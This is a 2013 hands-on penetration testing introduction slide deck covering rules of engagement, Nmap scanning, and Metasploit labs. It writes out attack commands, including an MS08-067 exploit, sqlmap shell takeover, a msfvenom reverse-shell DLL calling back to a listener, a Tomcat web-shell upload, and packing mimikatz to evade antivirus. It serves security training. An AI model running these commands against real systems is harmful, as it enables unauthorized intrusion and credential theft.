DC612 Day - Hands on Penetration Testing 101

D
Hands on Penetration Testing 101
                  DC612: March 9, 2013
Who are we?

• Karl Fosaaen
• Scott Sutherland
---
Security Consultants
@ NetSPI
Presentation Overview

•   What is a “Penetration Test”?
•   Why do companies “Pen test”?
•   Assessment VS. penetration test
•   Common penetration test approach
•   Rules of engagement
•   Nmap intro
•   Metasploit intro
•   Pen test labs
•   Wrap Up
What is Penetration Testing?

“The process of evaluating systems,
applications, and protocols with the intent
of identifying vulnerabilities from the
perspective of an unprivileged or trusted
user to determine the potential real world
impacts…”

“…legally and under contract”
Why do Companies Pen Test?

•   Compliance requirements
•   Identify unknown security gaps
•   Prioritize existing security initiatives
•   Validate existing controls
•   Prevent data breaches
•   Test IDS / IPS / IRP
What are the Technical Objectives?

•   Client specific objectives first
•   Identify and verify all entry points
•   Identify critical escalation points
•   Gain unauthorized access to:
    ‒ Application functionality
    ‒ Critical systems
    ‒ Sensitive data
Assessment VS. Penetration

• Vulnerability Assessment and
  Penetration Testing Answer:
  ‒ What are my system layer vulnerabilities?
  ‒ Where are my system layer vulnerabilities?
  ‒ How wide spread are my system layer
    vulnerabilities?
  ‒ Can I identify attacks?
  ‒ How do I fix my vulnerabilities?
Assessment VS. Penetration
• Penetration Testing Answers:
   ‒ What are my high impact network layer issues?
   ‒ What are my high impact application layer issues?
   ‒ Can an attacker gain unauthorized access to:
     •   critical infrastructure that provides privileged access
         or cause service disruptions
     •   critical application functionality that the business
         depends on
     •sensitive data that the business would be
      required to report on if a breach occurs
  ‒ Can an attacker bypass our IPS / WAF?
  ‒ Can an attacker pivot from environment A to
    environment B?
Rules of Engagement

•   Have fun, but…Hack Responsibly!
•   Written permission
•   Stay in scope
•   No DoS
•   Don’t change major state
•   Restore state
•   Clear communication
Intro to the Common Toolsets

• Backtrack
• Nmap
• Metasploit
Intro to the Common Toolsets

• Backtrack
• Nmap
• Metasploit
Installing Backtrack

• Goal
  ‒ Consolidate tools, and generally make a
    penetration testing platform that is free.
• Download Latest BT ISO
  ‒ http://www.backtrack-linux.org/downloads/
  ‒ Click download and choose ISO
• Download UNetbootin or YUMI
  ‒ http://unetbootin.sourceforge.net/
  ‒ http://www.pendrivelinux.com/yumi-multiboot-
    usb-creator/
• Install to USB
  ‒ Follow program wizards to write ISO to USB
Intro to the Common Toolsets

• Backtrack
• Nmap
• Metasploit
Nmap Introduction

• Purpose: Service mapping, and vulnerability
  scanning
• Download: insecure.org
• Language: Based in C/C++, scripting in LUA
• Modules types: Mostly enumeration, but
  there are some exploits modules
• Execution options: nmap cli and zenmap GUI
• Scripts: Ship with nmap by default, but can
  be download from insecure.org
Installing Nmap: Linux (Ubuntu)

• Download the latest build from:
    ‒ http://nmap.org/download.html
    ‒ svn co –username guest
•   Dependencies: gcc, openssl, and make
•   Install as root
•   apt-get install nmap
•   Install from source:
    ‒ ./configure && make && make install
• Flags exist to remove features
    --without-zenmap
Installing Nmap: Windows

• Windows
  ‒ Download the latest from
    http://nmap.org/download.html
  ‒ Login as admin, double click, next, next, done
  ‒ Say YES! To winpcap
Nmap Tools

• Nmap: Used for network mapping and
  auditing
• Ncat: Similar to netcat, but better
• Ndiff: Used for comparing nmap scans
• Nping: Used for understand firewall rules,
  detect corruptions, and etc
• Zenmap: Gui interface
Nmap Introduction

• LUA Scripts
         Located in:       /nmap/scripts
• Script Categories:
  ‒ Auth                   ‒ External
  ‒ Broadcast              ‒ Fuzzer
  ‒ Brute                  ‒ Intrusive
  ‒ default                ‒ Malware
  ‒ Discovery              ‒ Safe
  ‒ Dos                    ‒ version
  ‒ Exploit                ‒ vuln

                       http://nmap.org/nsedoc/scripts/
Intro to the Common Toolsets

• Backtrack
• Nmap
• Metasploit
Metasploit Introduction

• Purpose: Develop and use scanners, admin
  tools, and exploits
• Download: metasploit.com or clone
  github.com repository.
• Language: Ruby
• Modules: Auxiliaries, Exploits, Encoders,
  Nops, Payloads, Post
• Execution options: msfconsole, msfcli, web
  interfaces, rpc interface, armitage
• Scripting: modules, resource scripts, startup
  scripts, auto-run scripts, IRB, railgun
Installing Metasploit: Windows

• Disable anti-virus or create directory
  exception
• Download from metasploit.com
  ‒ Login as admin, double click, next, next, done
• Download git client for Windows
  ‒ git clone
    https://github.com/rapid7/metasploit-
    framework.git
• Service / process heavy
Installing Metasploit: Linux (Ubuntu)

• apt-get update && apt-get install
  metasploit
• Download git client for Linux
  ‒ git clone
    https://github.com/rapid7/metasploit-
    framework.git
Metasploit Introduction

• Modules are located in the following
    default Metasploit directories:

•   Auxiliary: /msf3/modules/auxiliary
•   Exploit: /msf3/modules/exploits
•   Encoders: /msf3/modules/encoders
•   Nops:      /msf3/modules/nops
•   Payloads: /msf3/modules/payloads
•   Post:      /msf3/modules/post
Metasploit: Console Commands

•?
• search tomcat
• use
   ‒ exploit/windows/smb/ms08_067_netapi
• show options
• show advance options
• set & setg
  ‒ payload windows/meterpreter/reverse_https
• exploit & run
• resource
Metasploit: Meterpreter Commands

•   ipconfig
•   ls
•   ps
•   migrate
•   shell
•   execute
•   Post modules
•   AutoRunScript (single or multiple
    commands)
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Asset Discovery: Overview (internal)

• Goal: Identify active systems and services.
  This should include web applications and web
  services.
• Common Methods:
   ‒ Passive identification (Sniffing)
   ‒ Directory Lookups (DNS, ADS, etc)
   ‒ Active identification (Scanning - Direct)
   ‒ Active identification (Scanning - Broadcast)
Asset Discovery: Labs

• Passive Network Mapping
  ‒ Wireshark: GUI
  ‒ Network Miner: GUI
  ‒ Cain and Abel
Asset Discovery: Labs

• Directory Listings
  ‒ ADS Computer names via computeraccounts$
    •   Dumpacl
    •   Metasploit smb_lookupsid module
    •   adfind.exe (joeware)
  ‒ DNS Server Lookups
    •   Nslookup –type=SRV _ldap._tcp.domain.com
    •   Dnsrecon.py
  ‒ DNS Zone Transfer
    •   Dig axfr domain.com @dnsserver
    •   Dnsrecon.py
Asset Discovery: Labs

• Target IP Formats
  ‒ Single
     •   Nmap 192.168.1.1
  ‒ Comma Separated
     •   Nmap 192.168.1.1, 192.168.1.1
  ‒ Range
     •   Nmap 192.168.1.1-254
  ‒ CIDR
     •   Nmap 192.168.1.0/24
  ‒ File
     •   Nmap –iL ipaddress.txt
Asset Discovery: Labs

• Target Port Formats
  ‒ All
     •   Nmap –p-
  ‒ Single
     •   Nmap –p80 192.168.1.1
  ‒ Comma
     •   Nmap –p80,443 192.168.1.1
  ‒ Range
     •   Nmap –p1-65535 192.168.1.1
  ‒ Protocol
     •   Nmap –sT –sU -pT:80,U:161
Asset Discovery: Labs

• List Scanning (RDNS)
  ‒ Nmap –sL 192.168.1.0/24
• Active Ping Sweeping
   ‒ ICMP TS: Nmap –PE 192.168.1.1
   ‒ SYN: Nmap –PS –p443 192.168.1.1
   ‒ ACK: Nmap –PA –p80 192.168.1.1
• Active Broadcast Ping
   ‒ ARP: Nmap –PR 192.168.1.1
   ‒ Scripts:
    •   Nmap --script=“broadcast”
Asset Discovery: Labs

• Basic Port Scanning
  ‒ TCP Full Connect
    •   Nmap –sT 192.168.1.1
  ‒ TCP SYN
    •   Nmap -sS 192.168.1.1
  ‒ No Ping
    •   Nmap –sS –Pn 192.168.1.1
  ‒ UDP
    •   Nmap –sU 192.168.1.1
Asset Discovery: Labs

• Basic Performance Tuning
  ‒ Timing
    •   Nmap –sS –p80-443 –Pn –t 5
    •   Higher is faster, but less accurate
  ‒ Disable RDNS lookup
    •   Nmap –sS –p80-443 –Pn –t 5 –n
    •   Nmap –sS –p80-443 –Pn –t 5 -R
Asset Discovery: Labs

• Active Finger Printing
  ‒ Service finger printing
     •Nmap -sV
  ‒ Operating system finger printing
     • Nmap –O
  ‒ Service and OS finger printing, script
    scanning, and traceroute
     •   Nmap -A
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Vulnerability Enumeration: Overview

• Goal: Identify vulnerabilities at the
  application, server, and network layers.
  Weed out false positives and highlight
  potential entry points.
• Common Methods:
  ‒ Automated identification
     •   All layers: Many tools, multiple rounds
  ‒ Manual identification
     •   Verify automated findings
     •   Application attacks
     •   Password attacks (defaults and guessing)
     •   Protocol attacks
Vulnerability Enumeration: Labs

• Basic Banner Grabbing
  ‒ Ncat –p 80 192.168.1.1
  ‒ Ncat –ssl –p443 192.168.1.1
  ‒ Ncat –U –p161 192.168.1.1
Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap
  ‒ Tomcat Case Study
    •   Identify service with Nmap
    •   Nmap –sV –p22,514,8009,8080,9090
        192.168.1.1
    •   Verify credentials manually
    •   Nmap --script=“vuln”
Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with MSF
  ‒ Tomcat Case Study
     •   Find servers
         •   use auxiliary/admin/http/tomcat_administration
     •   Find weak passwords
         •   use auxiliary/scanner/http/tomcat_mgr_login
Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap
  ‒ MS08_067 Case Study
    •   Identify with Nmap
    •   nmap --script smb-check-vulns.nse -p445
        192.168.1.1
Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap
  ‒ SQL Injection Case Study
    •   Identify with SQLMap
    •   python sqlmap.py -u
        http://192.168.1.106/employee.asp?id=1 -s
        session_log
    •   Verify Manually
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Penetration: Overview

• Goal: Gain initial unauthorized access to
  systems, applications, and sensitive data.
• Common Methods:
  Generally, vulnerabilities result in read access,
  write access, or arbitrary command execution.
  ‒ Default credentials
  ‒ Weak protocols
  ‒ SQL Injection
  ‒ Upload vulnerabilities
  ‒ Missing critical patches
Penetration: Labs

• Tomcat Case Study:
   ‒ Log into tomcat with default password
   ‒ Create the war file
     •   Or use the CMD.war from the additional
         tools folder
         •   Custom = unpack,edit,repack
         •   http://www.nruns.com/_downloads/Whitep
             aper-Hacking-jBoss-using-a-Browser.pdf
  ‒ Publish the payload to get the web shell
  ‒ Navigate to the /cmd/cmd.jsp page
Penetration: Labs

• MS08_067 Case Study:
  ‒ Run Metasploit Exploit
    •   use exploit/windows/smb/ms08_067_netapi
    •   set RHOST 192.168.1.1
    •   exploit
Penetration: Labs

• SQL Injection Case Study:
   ‒ Use SQLMap to get SQL Shell
    •   python sqlpmap/sqlmap.py -u
        http://192.168.1.106/employee.asp?id=1 --sql-shell
        -s session_log
  ‒ Use SQLMap to get Meterpreter Shell
    •   python sqlmap.py -u
        http://192.168.1.106/employee.asp?id=1 -v 1 --os-
        pwn --msf-path=/opt/framework3/msf3 -s
        session_log --priv-esc
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Escalation: Overview

• Goal: Escalate privileges to gain access to
  critical resources.
• Common Methods (Windows):
  ‒ Getsystem (with UAC Bypass)
  ‒ Clear text passwords
  ‒ Known local exploits (sysret example)
  ‒ Service attacks
  ‒ Scheduler attacks
  ‒ Impersonate Tokens (incognito or migrate)
  ‒ Dump passwords (mimikatz, and msfpost)
  ‒ Pass the hash (smart_hashdump + psexec)
Escalation: Labs

• GETSYSTEM
   ‒ Configure psexec with autorunscript
• Attack Scheduled Tasks
   ‒ Create scheduled task to run as system
   ‒ Configure task to run batch script files
   ‒ Give “Everyone” write access to scripts
• Attack Insecure Services
   ‒ Create insecurely registered service
   ‒ Drop evil program.exe
   ‒ Restart server for shell (auto migrate)
Bypassing Anti-Virus: Overview

• Goal: Execute malicious code without getting
  squashed by anti-virus.
• Common Methods
  ‒ Bypass anti-virus configuration
  ‒ Source code manipulation
  ‒ Binary manipulation
  ‒ Process / thread manipulation
Bypassing Anti-Virus: Labs

• Bypass configuration
   ‒ Create a MSF DLL with reverse https payload
     •   msfvenom -p
         windows/meterpreter/reverse_https -e -i 1
         LHOST=192.168.74.162 LPORT=55555 -f dll 1 >
         payload.dll
• Process Injection
   ‒ Create a powershell injection payload with
     ps_webshellscript
• Pack an existing files
   ‒ Modify binary
   ‒ Pack mimikatz with mpress, upx, or iexpress
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Evidence Gathering (Pilfering): Labs

• Finding Sensitive Files
   ‒ Common Locations
    •   Databases
    •   Text files
    •   Applications
• Automated tools
   ‒ Spider
   ‒ Metasploit post modules
    •   auxiliary/admin/mssql/mssql_findandsampledata
Evidence Gathering (Pilfering): Labs

• Windows
  ‒ Find
• Linux
  ‒ Find
  ‒ Locate
  ‒ Grep/sed/awk
• Applications
  ‒ Thick client and Web apps
Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc
•   Information Gathering
•   Vulnerability Enumeration
•   Penetration
•   Escalation
•   Evidence Gathering (Pilfering)
•   Clean up
• Report Creation
• Report Delivery and Review
• Remediation
Clean Up: Overview

• Goal: Be polite and leave the environment as
  you found it.

• Standard Clean Items
  ‒ Remove backdoors
  ‒ Remove all uploaded and generated files
  ‒ Restore all service states
  ‒ Restore all other configuration states
  ‒ Remove accounts that were created

• Leave the logs – the goal is transparency
Wrap Up

• We covered:
  ‒ What penetration testing is
  ‒ Why companies pay for penetration testing
  ‒ What the rules of engagement are
  ‒ What the common approach is
  ‒ How to leverage a few common vulnerabilities

  But most importantly don’t for get to….
BE SAFE and

HACK RESPONSIBLY
Questions




   Questions,
comments, curses?
1 of 61

More Related Content

Similar to DC612 Day - Hands on Penetration Testing 101(20)

Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert1.1K views
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani5.8K views
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
The Security of Things Forum653 views
Open Source Cyber WeaponryOpen Source Cyber Weaponry
Open Source Cyber Weaponry
Joshua L. Davis2K views
ethical Hackethical Hack
ethical Hack
Viggi Unbeaten822 views
Wm4Wm4
Wm4
Umang Patel313 views
Wm4Wm4
Wm4
Umang Patel320 views
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
Mohammed Adam89 views
Nomura UCCSC 2009Nomura UCCSC 2009
Nomura UCCSC 2009
dnomura359 views
MetasploitMetasploit
Metasploit
Lalith Sai436 views
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy993 views
Hacking - penetration toolsHacking - penetration tools
Hacking - penetration tools
JenishChauhan4196 views
lecture5.pptxlecture5.pptx
lecture5.pptx
Llobarro22 views

DC612 Day - Hands on Penetration Testing 101

  • 1. Hands on Penetration Testing 101 DC612: March 9, 2013
  • 2. Who are we? • Karl Fosaaen • Scott Sutherland --- Security Consultants @ NetSPI
  • 3. Presentation Overview • What is a “Penetration Test”? • Why do companies “Pen test”? • Assessment VS. penetration test • Common penetration test approach • Rules of engagement • Nmap intro • Metasploit intro • Pen test labs • Wrap Up
  • 4. What is Penetration Testing? “The process of evaluating systems, applications, and protocols with the intent of identifying vulnerabilities from the perspective of an unprivileged or trusted user to determine the potential real world impacts…” “…legally and under contract”
  • 5. Why do Companies Pen Test? • Compliance requirements • Identify unknown security gaps • Prioritize existing security initiatives • Validate existing controls • Prevent data breaches • Test IDS / IPS / IRP
  • 6. What are the Technical Objectives? • Client specific objectives first • Identify and verify all entry points • Identify critical escalation points • Gain unauthorized access to: ‒ Application functionality ‒ Critical systems ‒ Sensitive data
  • 7. Assessment VS. Penetration • Vulnerability Assessment and Penetration Testing Answer: ‒ What are my system layer vulnerabilities? ‒ Where are my system layer vulnerabilities? ‒ How wide spread are my system layer vulnerabilities? ‒ Can I identify attacks? ‒ How do I fix my vulnerabilities?
  • 8. Assessment VS. Penetration • Penetration Testing Answers: ‒ What are my high impact network layer issues? ‒ What are my high impact application layer issues? ‒ Can an attacker gain unauthorized access to: • critical infrastructure that provides privileged access or cause service disruptions • critical application functionality that the business depends on •sensitive data that the business would be required to report on if a breach occurs ‒ Can an attacker bypass our IPS / WAF? ‒ Can an attacker pivot from environment A to environment B?
  • 9. Rules of Engagement • Have fun, but…Hack Responsibly! • Written permission • Stay in scope • No DoS • Don’t change major state • Restore state • Clear communication
  • 10. Intro to the Common Toolsets • Backtrack • Nmap • Metasploit
  • 11. Intro to the Common Toolsets • Backtrack • Nmap • Metasploit
  • 12. Installing Backtrack • Goal ‒ Consolidate tools, and generally make a penetration testing platform that is free. • Download Latest BT ISO ‒ http://www.backtrack-linux.org/downloads/ ‒ Click download and choose ISO • Download UNetbootin or YUMI ‒ http://unetbootin.sourceforge.net/ ‒ http://www.pendrivelinux.com/yumi-multiboot- usb-creator/ • Install to USB ‒ Follow program wizards to write ISO to USB
  • 13. Intro to the Common Toolsets • Backtrack • Nmap • Metasploit
  • 14. Nmap Introduction • Purpose: Service mapping, and vulnerability scanning • Download: insecure.org • Language: Based in C/C++, scripting in LUA • Modules types: Mostly enumeration, but there are some exploits modules • Execution options: nmap cli and zenmap GUI • Scripts: Ship with nmap by default, but can be download from insecure.org
  • 15. Installing Nmap: Linux (Ubuntu) • Download the latest build from: ‒ http://nmap.org/download.html ‒ svn co –username guest • Dependencies: gcc, openssl, and make • Install as root • apt-get install nmap • Install from source: ‒ ./configure && make && make install • Flags exist to remove features --without-zenmap
  • 16. Installing Nmap: Windows • Windows ‒ Download the latest from http://nmap.org/download.html ‒ Login as admin, double click, next, next, done ‒ Say YES! To winpcap
  • 17. Nmap Tools • Nmap: Used for network mapping and auditing • Ncat: Similar to netcat, but better • Ndiff: Used for comparing nmap scans • Nping: Used for understand firewall rules, detect corruptions, and etc • Zenmap: Gui interface
  • 18. Nmap Introduction • LUA Scripts Located in: /nmap/scripts • Script Categories: ‒ Auth ‒ External ‒ Broadcast ‒ Fuzzer ‒ Brute ‒ Intrusive ‒ default ‒ Malware ‒ Discovery ‒ Safe ‒ Dos ‒ version ‒ Exploit ‒ vuln http://nmap.org/nsedoc/scripts/
  • 19. Intro to the Common Toolsets • Backtrack • Nmap • Metasploit
  • 20. Metasploit Introduction • Purpose: Develop and use scanners, admin tools, and exploits • Download: metasploit.com or clone github.com repository. • Language: Ruby • Modules: Auxiliaries, Exploits, Encoders, Nops, Payloads, Post • Execution options: msfconsole, msfcli, web interfaces, rpc interface, armitage • Scripting: modules, resource scripts, startup scripts, auto-run scripts, IRB, railgun
  • 21. Installing Metasploit: Windows • Disable anti-virus or create directory exception • Download from metasploit.com ‒ Login as admin, double click, next, next, done • Download git client for Windows ‒ git clone https://github.com/rapid7/metasploit- framework.git • Service / process heavy
  • 22. Installing Metasploit: Linux (Ubuntu) • apt-get update && apt-get install metasploit • Download git client for Linux ‒ git clone https://github.com/rapid7/metasploit- framework.git
  • 23. Metasploit Introduction • Modules are located in the following default Metasploit directories: • Auxiliary: /msf3/modules/auxiliary • Exploit: /msf3/modules/exploits • Encoders: /msf3/modules/encoders • Nops: /msf3/modules/nops • Payloads: /msf3/modules/payloads • Post: /msf3/modules/post
  • 24. Metasploit: Console Commands •? • search tomcat • use ‒ exploit/windows/smb/ms08_067_netapi • show options • show advance options • set & setg ‒ payload windows/meterpreter/reverse_https • exploit & run • resource
  • 25. Metasploit: Meterpreter Commands • ipconfig • ls • ps • migrate • shell • execute • Post modules • AutoRunScript (single or multiple commands)
  • 26. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 27. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 28. Asset Discovery: Overview (internal) • Goal: Identify active systems and services. This should include web applications and web services. • Common Methods: ‒ Passive identification (Sniffing) ‒ Directory Lookups (DNS, ADS, etc) ‒ Active identification (Scanning - Direct) ‒ Active identification (Scanning - Broadcast)
  • 29. Asset Discovery: Labs • Passive Network Mapping ‒ Wireshark: GUI ‒ Network Miner: GUI ‒ Cain and Abel
  • 30. Asset Discovery: Labs • Directory Listings ‒ ADS Computer names via computeraccounts$ • Dumpacl • Metasploit smb_lookupsid module • adfind.exe (joeware) ‒ DNS Server Lookups • Nslookup –type=SRV _ldap._tcp.domain.com • Dnsrecon.py ‒ DNS Zone Transfer • Dig axfr domain.com @dnsserver • Dnsrecon.py
  • 31. Asset Discovery: Labs • Target IP Formats ‒ Single • Nmap 192.168.1.1 ‒ Comma Separated • Nmap 192.168.1.1, 192.168.1.1 ‒ Range • Nmap 192.168.1.1-254 ‒ CIDR • Nmap 192.168.1.0/24 ‒ File • Nmap –iL ipaddress.txt
  • 32. Asset Discovery: Labs • Target Port Formats ‒ All • Nmap –p- ‒ Single • Nmap –p80 192.168.1.1 ‒ Comma • Nmap –p80,443 192.168.1.1 ‒ Range • Nmap –p1-65535 192.168.1.1 ‒ Protocol • Nmap –sT –sU -pT:80,U:161
  • 33. Asset Discovery: Labs • List Scanning (RDNS) ‒ Nmap –sL 192.168.1.0/24 • Active Ping Sweeping ‒ ICMP TS: Nmap –PE 192.168.1.1 ‒ SYN: Nmap –PS –p443 192.168.1.1 ‒ ACK: Nmap –PA –p80 192.168.1.1 • Active Broadcast Ping ‒ ARP: Nmap –PR 192.168.1.1 ‒ Scripts: • Nmap --script=“broadcast”
  • 34. Asset Discovery: Labs • Basic Port Scanning ‒ TCP Full Connect • Nmap –sT 192.168.1.1 ‒ TCP SYN • Nmap -sS 192.168.1.1 ‒ No Ping • Nmap –sS –Pn 192.168.1.1 ‒ UDP • Nmap –sU 192.168.1.1
  • 35. Asset Discovery: Labs • Basic Performance Tuning ‒ Timing • Nmap –sS –p80-443 –Pn –t 5 • Higher is faster, but less accurate ‒ Disable RDNS lookup • Nmap –sS –p80-443 –Pn –t 5 –n • Nmap –sS –p80-443 –Pn –t 5 -R
  • 36. Asset Discovery: Labs • Active Finger Printing ‒ Service finger printing •Nmap -sV ‒ Operating system finger printing • Nmap –O ‒ Service and OS finger printing, script scanning, and traceroute • Nmap -A
  • 37. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 38. Vulnerability Enumeration: Overview • Goal: Identify vulnerabilities at the application, server, and network layers. Weed out false positives and highlight potential entry points. • Common Methods: ‒ Automated identification • All layers: Many tools, multiple rounds ‒ Manual identification • Verify automated findings • Application attacks • Password attacks (defaults and guessing) • Protocol attacks
  • 39. Vulnerability Enumeration: Labs • Basic Banner Grabbing ‒ Ncat –p 80 192.168.1.1 ‒ Ncat –ssl –p443 192.168.1.1 ‒ Ncat –U –p161 192.168.1.1
  • 40. Vulnerability Enumeration: Labs • Scanning for vulnerabilities with Nmap ‒ Tomcat Case Study • Identify service with Nmap • Nmap –sV –p22,514,8009,8080,9090 192.168.1.1 • Verify credentials manually • Nmap --script=“vuln”
  • 41. Vulnerability Enumeration: Labs • Scanning for vulnerabilities with MSF ‒ Tomcat Case Study • Find servers • use auxiliary/admin/http/tomcat_administration • Find weak passwords • use auxiliary/scanner/http/tomcat_mgr_login
  • 42. Vulnerability Enumeration: Labs • Scanning for vulnerabilities with Nmap ‒ MS08_067 Case Study • Identify with Nmap • nmap --script smb-check-vulns.nse -p445 192.168.1.1
  • 43. Vulnerability Enumeration: Labs • Scanning for vulnerabilities with Nmap ‒ SQL Injection Case Study • Identify with SQLMap • python sqlmap.py -u http://192.168.1.106/employee.asp?id=1 -s session_log • Verify Manually
  • 44. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 45. Penetration: Overview • Goal: Gain initial unauthorized access to systems, applications, and sensitive data. • Common Methods: Generally, vulnerabilities result in read access, write access, or arbitrary command execution. ‒ Default credentials ‒ Weak protocols ‒ SQL Injection ‒ Upload vulnerabilities ‒ Missing critical patches
  • 46. Penetration: Labs • Tomcat Case Study: ‒ Log into tomcat with default password ‒ Create the war file • Or use the CMD.war from the additional tools folder • Custom = unpack,edit,repack • http://www.nruns.com/_downloads/Whitep aper-Hacking-jBoss-using-a-Browser.pdf ‒ Publish the payload to get the web shell ‒ Navigate to the /cmd/cmd.jsp page
  • 47. Penetration: Labs • MS08_067 Case Study: ‒ Run Metasploit Exploit • use exploit/windows/smb/ms08_067_netapi • set RHOST 192.168.1.1 • exploit
  • 48. Penetration: Labs • SQL Injection Case Study: ‒ Use SQLMap to get SQL Shell • python sqlpmap/sqlmap.py -u http://192.168.1.106/employee.asp?id=1 --sql-shell -s session_log ‒ Use SQLMap to get Meterpreter Shell • python sqlmap.py -u http://192.168.1.106/employee.asp?id=1 -v 1 --os- pwn --msf-path=/opt/framework3/msf3 -s session_log --priv-esc
  • 49. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 50. Escalation: Overview • Goal: Escalate privileges to gain access to critical resources. • Common Methods (Windows): ‒ Getsystem (with UAC Bypass) ‒ Clear text passwords ‒ Known local exploits (sysret example) ‒ Service attacks ‒ Scheduler attacks ‒ Impersonate Tokens (incognito or migrate) ‒ Dump passwords (mimikatz, and msfpost) ‒ Pass the hash (smart_hashdump + psexec)
  • 51. Escalation: Labs • GETSYSTEM ‒ Configure psexec with autorunscript • Attack Scheduled Tasks ‒ Create scheduled task to run as system ‒ Configure task to run batch script files ‒ Give “Everyone” write access to scripts • Attack Insecure Services ‒ Create insecurely registered service ‒ Drop evil program.exe ‒ Restart server for shell (auto migrate)
  • 52. Bypassing Anti-Virus: Overview • Goal: Execute malicious code without getting squashed by anti-virus. • Common Methods ‒ Bypass anti-virus configuration ‒ Source code manipulation ‒ Binary manipulation ‒ Process / thread manipulation
  • 53. Bypassing Anti-Virus: Labs • Bypass configuration ‒ Create a MSF DLL with reverse https payload • msfvenom -p windows/meterpreter/reverse_https -e -i 1 LHOST=192.168.74.162 LPORT=55555 -f dll 1 > payload.dll • Process Injection ‒ Create a powershell injection payload with ps_webshellscript • Pack an existing files ‒ Modify binary ‒ Pack mimikatz with mpress, upx, or iexpress
  • 54. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 55. Evidence Gathering (Pilfering): Labs • Finding Sensitive Files ‒ Common Locations • Databases • Text files • Applications • Automated tools ‒ Spider ‒ Metasploit post modules • auxiliary/admin/mssql/mssql_findandsampledata
  • 56. Evidence Gathering (Pilfering): Labs • Windows ‒ Find • Linux ‒ Find ‒ Locate ‒ Grep/sed/awk • Applications ‒ Thick client and Web apps
  • 57. Common Penetration Test Approach • Kickoff: Scope, cost, testing windows, risks etc • Information Gathering • Vulnerability Enumeration • Penetration • Escalation • Evidence Gathering (Pilfering) • Clean up • Report Creation • Report Delivery and Review • Remediation
  • 58. Clean Up: Overview • Goal: Be polite and leave the environment as you found it. • Standard Clean Items ‒ Remove backdoors ‒ Remove all uploaded and generated files ‒ Restore all service states ‒ Restore all other configuration states ‒ Remove accounts that were created • Leave the logs – the goal is transparency
  • 59. Wrap Up • We covered: ‒ What penetration testing is ‒ Why companies pay for penetration testing ‒ What the rules of engagement are ‒ What the common approach is ‒ How to leverage a few common vulnerabilities But most importantly don’t for get to….
  • 60. BE SAFE and HACK RESPONSIBLY
  • 61. Questions Questions, comments, curses?

Editor's Notes

  1. Intros - bothIntro to Pen - Scott up to 10Intro to tools - Karl 11 to 26Test Approach and info gather - 27 to 37Vulnenum - up to 44pen - Scott 45 to escalation - KarlEvidence - KarlClean up and wrap up - Scott
  2. THESE ARE BUSINESS GOALS ON THE SLIDE----------------------------------------Compliance requirements – pci, hipaa, etcValidate existing controls – fw, server, appIdentify unknown security gaps – network, app, serverPrioritize existing security initiatives – get rid of noise, find high impact issuesPrevent data breaches – doesn’t real do what the client wants it toOther detail from wikipedia:Determining the feasibility of a particular set of attack vectorsIdentifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequenceIdentifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning softwareAssessing the magnitude of potential business and operational impacts of successful attacksTesting the ability of network defenders to successfully detect and respond to the attacksProviding evidence to support increased investments in security personnel and technology
